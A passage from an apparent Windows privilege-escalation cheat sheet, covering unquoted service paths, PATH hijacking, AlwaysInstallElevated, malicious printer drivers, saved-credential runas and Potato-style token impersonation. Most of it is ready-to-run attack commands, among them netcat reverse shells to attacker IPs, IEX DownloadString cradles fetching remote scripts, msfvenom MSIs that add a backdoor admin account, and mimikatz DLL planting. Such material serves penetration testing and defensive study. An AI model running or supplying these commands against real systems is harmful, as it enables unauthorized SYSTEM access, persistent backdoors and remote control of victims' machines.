`C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` 788 789 ## EoP - Unquoted Service Paths 790 791 The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. 792 793 ```powershell 794 # in CMD 795 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ 796 wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ 797 # in PowerShell 798 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name 799 ``` 800 801 * Metasploit exploit : `exploit/windows/local/trusted_service_path` 802 * PowerUp exploit 803 804 ```powershell 805 # find the vulnerable application 806 C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" 807 808 ... 809 [*] Checking for unquoted service paths... 810 ServiceName : BBSvc 811 Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe 812 StartName : LocalSystem 813 AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath> 814 ... 815 816 # automatic exploit 817 Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" 818 ``` 819 820 ### Example 821 822 For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: 823 824 * `C:\Program.exe` 825 * `C:\Program Files.exe` 826 827 ## EoP - $PATH Interception 828 829 Requirements: 830 831 * PATH contains a writable folder with low privileges. 832 * The writable folder is _before_ the folder that contains the legitimate binary. 833 834 EXAMPLE: 835 836 ```powershell 837 # List contents of the PATH environment variable 838 # EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 839 $env:Path 840 841 # See permissions of the target folder 842 # EXAMPLE OUTPUT: BUILTIN\Users: GR,GW 843 icacls.exe "C:\Program Files\nodejs\" 844 845 # Place our evil-file in that folder. 846 copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" 847 ``` 848 849 Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. 850 851 ## EoP - Named Pipes 852 853 1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` 854 2. Check named pipes DACL: `pipesec.exe <named_pipe>` 855 3. Reverse engineering software 856 4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` 857 858 ## EoP - Kernel Exploitation 859 860 List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) 861 862 ### Security Bulletin Table 863 864 | Security Bulletin | KB | Description | Operating System | 865 | --------------------------------------------------------------------------------------------- | --------- | ------------------------------------------------ | ----------------------------------- | 866 | [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017) | KB4013081 | GDI Palette Objects Local Privilege Escalation | Windows 7/8 | 867 | [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) | - | LNK Remote Code Execution Vulnerability | Windows 10/8.1/7/2016/2010/2008 | 868 | [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) | - | Windows COM Elevation of Privilege Vulnerability | Windows 10/8.1/7/2016/2010/2008 | 869 | [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) | - | SMBv3 Null Pointer Dereference Denial of Service | Windows 8.1/Server 2012 R2 | 870 | [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) | - | Win32k Elevation of Privilege Vulnerability | Windows 7 SP1/2008 SP2, 2008 R2 SP1 | 871 | [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010) | KB4013389 | Windows Kernel Mode Drivers | Windows 7/2008/2003/XP | 872 | [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135) | KB3199135 | Windows Kernel Mode Drivers | 2016 | 873 | [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111) | KB3186973 | Kernel API | Windows 10 10586 (32/64)/8.1 | 874 | [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) | KB3178466 | Kernel Driver | Windows 8.1 | 875 | [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) | KB3164038 | Hot Potato | 2003/2008/7/8/2012 | 876 | [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034) | KB3143145 | Kernel Driver | 2008/7/8/10/2012 | 877 | [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032) | KB3143141 | Secondary Logon Handle | 2008/7/8/10/2012 | 878 | [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016) | KB3136041 | WebDAV | 2008/Vista/7 | 879 | [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014) | KB3134228 | Remote Code Execution | 2008/Vista/7 | 880 | [MS03-026](https://www.exploit-db.com/exploits/66) | KB823980 | Buffer Overrun In RPC Interface | NT/2000/XP/2003 | 881 882 To cross compile a program from Kali, use the following command. 883 884 ```powershell 885 Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c 886 ``` 887 888 ## EoP - Microsoft Windows Installer 889 890 ### AlwaysInstallElevated 891 892 Using the `reg query` command, you can check the status of the `AlwaysInstallElevated` registry key for both the user and the machine. If both queries return a value of `0x1`, then `AlwaysInstallElevated` is enabled for both user and machine, indicating the system is vulnerable. 893 894 * Shell command 895 896 ```powershell 897 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 898 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 899 ``` 900 901 * PowerShell command 902 903 ```powershell 904 Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer 905 Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer 906 ``` 907 908 Then create an MSI package and install it. 909 910 ```powershell 911 msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi 912 msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi 913 msiexec /quiet /qn /i C:\evil.msi 914 ``` 915 916 Technique also available in : 917 918 * Metasploit : `exploit/windows/local/always_install_elevated` 919 * PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` 920 921 ### CustomActions 922 923 > Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation 924 925 * [mgeeky/msidump](https://github.com/mgeeky/msidump) - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. 926 * [activescott/lessmsi](https://github.com/activescott/lessmsi) - A tool to view and extract the contents of an Windows Installer (.msi) file. 927 * [mandiant/msi-search](https://github.com/mandiant/msi-search) - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file. 928 929 Enumerate products on the machine 930 931 ```ps1 932 Get-WmiObject Win32_Product | Select Name, LocalPackage 933 wmic product get identifyingnumber,name,vendor,version,localpackage 934 ``` 935 936 Execute the repair process with the `/fa` parameter to trigger the CustomActions. 937 We can use both IdentifyingNumber `{E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1}` or path to the installer `c:\windows\installer\XXXXXXX.msi`. 938 The repair will run with the NT SYSTEM account. 939 940 ```ps1 941 $installed = Get-WmiObject Win32_Product 942 $string= $installed | select-string -pattern "PRODUCTNAME" 943 $string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}' 944 Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])" 945 ``` 946 947 Common mistakes in MSI installers: 948 949 * Missing quiet parameters: it will spawn `conhost.exe` as `NT SYSTEM`. Use `[CTRL]+[A]` to select some text in it, it will pause the execution. 950 * conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –> cmd.exe 951 * GUI with direct actions: open a URL and start the browser then use the same scenario. 952 * Binaries/Scripts loaded from user writable paths: you might need to win the race condition. 953 * DLL hijacking/search order abusing 954 * PowerShell `-NoProfile` missing: Add custom commands into your profile 955 956 ```ps1 957 new-item -Path $PROFILE -Type file -Force 958 echo "Start-Process -FilePath cmd.exe -Wait;" > $PROFILE 959 ``` 960 961 ## EoP - Insecure GUI apps 962 963 Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. 964 965 Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" 966 967 ## EoP - Evaluating Vulnerable Drivers 968 969 Look for vuln drivers loaded, we often don't spend enough time looking at this: 970 971 * [Living Off The Land Drivers](https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. 972 * Native binary: DriverQuery.exe 973 974 ```powershell 975 PS C:\Users\Swissky> driverquery.exe /fo table /si 976 Module Name Display Name Driver Type Link Date 977 ============ ====================== ============= ====================== 978 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 979 3ware 3ware Kernel 5/18/2015 6:28:03 PM 980 ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM 981 AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM 982 acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM 983 acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM 984 AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM 985 acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM 986 ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM 987 <SNIP> 988 ``` 989 990 * [matterpreter/OffensiveCSharp/DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery) 991 992 ```powershell 993 PS C:\Users\Swissky> DriverQuery.exe --no-msft 994 [+] Enumerating driver services... 995 [+] Checking file signatures... 996 Citrix USB Filter Driver 997 Service Name: ctxusbm 998 Path: C:\Windows\system32\DRIVERS\ctxusbm.sys 999 Version: 14.11.0.138 1000 Creation Time (UTC): 17/05/2018 01:20:50 1001 Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US 1002 Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US 1003 <SNIP> 1004 ``` 1005 1006 ## EoP - Printers 1007 1008 ### Universal Printer 1009 1010 Create a Printer 1011 1012 ```ps1 1013 $printerName = 'Universal Priv Printer' 1014 $system32 = $env:systemroot + '\system32' 1015 $drivers = $system32 + '\spool\drivers' 1016 $RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName 1017 1018 Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') 1019 Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') 1020 Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') 1021 1022 Add-PrinterDriver -Name 'Generic / Text Only' 1023 Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared 1024 1025 New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null 1026 New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null 1027 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null 1028 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null 1029 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null 1030 New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null 1031 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null 1032 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null 1033 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null 1034 New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null 1035 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null 1036 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null 1037 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null 1038 ``` 1039 1040 Execute the driver 1041 1042 ```ps1 1043 $serverName = 'dc.purple.lab' 1044 $printerName = 'Universal Priv Printer' 1045 $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) 1046 Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue 1047 Add-Printer -ConnectionName $fullprinterName 1048 ``` 1049 1050 ### PrinterNightmare 1051 1052 ```ps1 1053 git clone https://github.com/Flangvik/DeployPrinterNightmare 1054 PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell 1055 [<3] @Flangvik - TrustedSec 1056 [+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll 1057 [+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll 1058 [+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll 1059 [+] Adding printer driver => Generic / Text Only! 1060 [+] Adding printer => EasySystemShell! 1061 [+] Setting 64-bit Registry key 1062 [+] Setting 32-bit Registry key 1063 [+] Setting '*' Registry key 1064 ``` 1065 1066 ```ps1 1067 PS C:\target> $serverName = 'printer-installed-host' 1068 PS C:\target> $printerName = 'EasySystemShell' 1069 PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) 1070 PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue 1071 PS C:\target> Add-Printer -ConnectionName $fullprinterName 1072 ``` 1073 1074 ### Bring Your Own Vulnerability 1075 1076 [jacob-baines/concealed_position](https://github.com/jacob-baines/concealed_position) 1077 1078 * ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE 1079 * RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE 1080 * POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE 1081 * SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE 1082 1083 ```powershell 1084 cp_server.exe -e ACIDDAMAGE 1085 # Get-Printer 1086 # Set the "Advanced Sharing Settings" -> "Turn off password protected sharing" 1087 cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE 1088 cp_client.exe -l -e ACIDDAMAGE 1089 ``` 1090 1091 ## EoP - Runas 1092 1093 Use the `cmdkey` to list the stored credentials on the machine. 1094 1095 ```powershell 1096 cmdkey /list 1097 Currently stored credentials: 1098 Target: Domain:interactive=WORKGROUP\Administrator 1099 Type: Domain Password 1100 User: WORKGROUP\Administrator 1101 ``` 1102 1103 Then you can use `runas` with the `/savecred` options in order to use the saved credentials. 1104 The following example is calling a remote binary via an SMB share. 1105 1106 ```powershell 1107 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" 1108 runas /savecred /user:Administrator "cmd.exe /k whoami" 1109 ``` 1110 1111 Using `runas` with a provided set of credential. 1112 1113 ```powershell 1114 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe" 1115 ``` 1116 1117 ```powershell 1118 $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force 1119 $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd) 1120 $computer = "<hostname>" 1121 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) 1122 ``` 1123 1124 ## EoP - Abusing Shadow Copies 1125 1126 If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. 1127 1128 ```powershell 1129 # List shadow copies using vssadmin (Needs Admnistrator Access) 1130 vssadmin list shadows 1131 1132 # List shadow copies using diskshadow 1133 diskshadow list shadows all 1134 1135 # Make a symlink to the shadow copy and access it 1136 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ 1137 ``` 1138 1139 ## EoP - From local administrator to NT SYSTEM 1140 1141 ```powershell 1142 PsExec.exe -i -s cmd.exe 1143 ``` 1144 1145 ## EoP - Living Off The Land Binaries and Scripts 1146 1147 Living Off The Land Binaries and Scripts (and also Libraries) : [lolbas-project.github.io](https://lolbas-project.github.io) 1148 1149 > The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. 1150 1151 A LOLBin/Lib/Script must: 1152 1153 * Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. 1154 Have extra "unexpected" functionality. It is not interesting to document intended use cases. 1155 Exceptions are application whitelisting bypasses 1156 * Have functionality that would be useful to an APT or red team 1157 1158 ```powershell 1159 wmic.exe process call create calc 1160 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll 1161 Microsoft.Workflow.Compiler.exe tests.xml results.xml 1162 ``` 1163 1164 ## EoP - Impersonation Privileges 1165 1166 Full privileges cheatsheet at [gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. 1167 1168 | Privilege | Impact | Tool | Execution path | Remarks | 1169 | ---------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 1170 | `SeAssignPrimaryToken` | _**Admin**_ | 3rd party tool | _"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"_ | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | 1171 | `SeBackup` | **Threat** | _**Built-in commands**_ | Read sensitve files with `robocopy /b` | - May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | 1172 | `SeCreateToken` | _**Admin**_ | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. | | 1173 | `SeDebug` | _**Admin**_ | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | 1174 | `SeLoadDriver` | _**Admin**_ | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | 1175 | `SeRestore` | _**Admin**_ | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U | Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | 1176 | `SeTakeOwnership` | _**Admin**_ | _**Built-in commands**_ | 1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U | Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | 1177 | `SeTcb` | _**Admin**_ | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. | | 1178 | `SeRelabel` | _**Admin**_ | 3rd party too | [decoder-it/RelabelAbuse](https://github.com/decoder-it/RelabelAbuse) | Allows you to own resources that have an integrity level even higher than your own | 1179 1180 ### Restore A Service Account's Privileges 1181 1182 > This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. 1183 1184 ```powershell 1185 # https://github.com/itm4n/FullPowers 1186 1187 c:\TOOLS>FullPowers 1188 [+] Started dummy thread with id 9976 1189 [+] Successfully created scheduled task. 1190 [+] Got new token! Privilege count: 7 1191 [+] CreateProcessAsUser() OK 1192 Microsoft Windows [Version 10.0.19041.84] 1193 (c) 2019 Microsoft Corporation. All rights reserved. 1194 1195 C:\WINDOWS\system32>whoami /priv 1196 PRIVILEGES INFORMATION 1197 ---------------------- 1198 Privilege Name Description State 1199 ============================= ========================================= ======= 1200 SeAssignPrimaryTokenPrivilege Replace a process level token Enabled 1201 SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled 1202 SeAuditPrivilege Generate security audits Enabled 1203 SeChangeNotifyPrivilege Bypass traverse checking Enabled 1204 SeImpersonatePrivilege Impersonate a client after authentication Enabled 1205 SeCreateGlobalPrivilege Create global objects Enabled 1206 SeIncreaseWorkingSetPrivilege Increase a process working set Enabled 1207 1208 c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z 1209 ``` 1210 1211 ### Meterpreter getsystem and alternatives 1212 1213 ```powershell 1214 meterpreter> getsystem 1215 Tokenvator.exe getsystem cmd.exe 1216 incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 1217 psexec -s -i cmd.exe 1218 python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc 1219 ``` 1220 1221 ### RottenPotato (Token Impersonation) 1222 1223 * Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) 1224 * Exploit using Metasploit with `incognito mode` loaded. 1225 1226 ```c 1227 getuid 1228 getprivs 1229 use incognito 1230 list\_tokens -u 1231 cd c:\temp\ 1232 execute -Hc -f ./rot.exe 1233 impersonate\_token "NT AUTHORITY\SYSTEM" 1234 ``` 1235 1236 ```powershell 1237 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" 1238 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" 1239 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" 1240 ``` 1241 1242 ### Juicy Potato (Abusing the golden privileges) 1243 1244 > If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato** 1245 > If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato** 1246 1247 * Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases) 1248 1249 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) 1250 1251 ```powershell 1252 whoami /priv 1253 ``` 1254 1255 2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object 1256 1257 * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) 1258 * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise) 1259 * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise) 1260 * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro) 1261 * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) 1262 * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter) 1263 * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) 1264 1265 3. Execute JuicyPotato to run a privileged command. 1266 1267 ```powershell 1268 JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} 1269 JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} 1270 JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" 1271 Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 1272 ...... 1273 [+] authresult 0 1274 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM 1275 [+] CreateProcessWithTokenW OK 1276 ``` 1277 1278 ### Rogue Potato (Fake OXID Resolver) 1279 1280 * Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) 1281 1282 ```powershell 1283 # Network redirector / port forwarder to run on your remote machine, must use port 135 as src port 1284 socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 1285 1286 # RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. 1287 # Use this if you have fw restrictions. 1288 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" 1289 1290 # RoguePotato all in one with RogueOxidResolver running locally on port 9999 1291 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 1292 1293 #RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename 1294 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode 1295 ``` 1296 1297 ### EFSPotato (MS-EFSR EfsRpcOpenFileRaw) 1298 1299 * Binary available at [zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) 1300 1301 ```powershell 1302 # .NET 4.x 1303 csc EfsPotato.cs 1304 csc /platform:x86 EfsPotato.cs 1305 1306 # .NET 2.0/3.5 1307 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs 1308 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs 1309 ``` 1310 1311 ### JuicyPotatoNG 1312 1313 * [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) 1314 1315 ```powershell 1316 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt 1317 ``` 1318 1319 ### PrintSpoofer (Printer Bug) 1320 1321 > this work if SeImpersonatePrivilege is enabled 1322 1323 * Binary available at [itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0) 1324 1325 ```powershell 1326 # run nc -lnvp 443 then : 1327 .\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd" 1328 # without listener 1329 .\PrintSpoofer64.exe -i -c cmd 1330 # Via RPD 1331 .\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass" 1332 ``` 1333 1334 ## EoP - Privileged File Write 1335 1336 ### DiagHub 1337 1338 :warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs. 1339 1340 The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. 1341 This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory. 1342 1343 #### Exploit 1344 1345 1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32` 1346 2. Build [xct/diaghub](https://github.com/xct/diaghub) 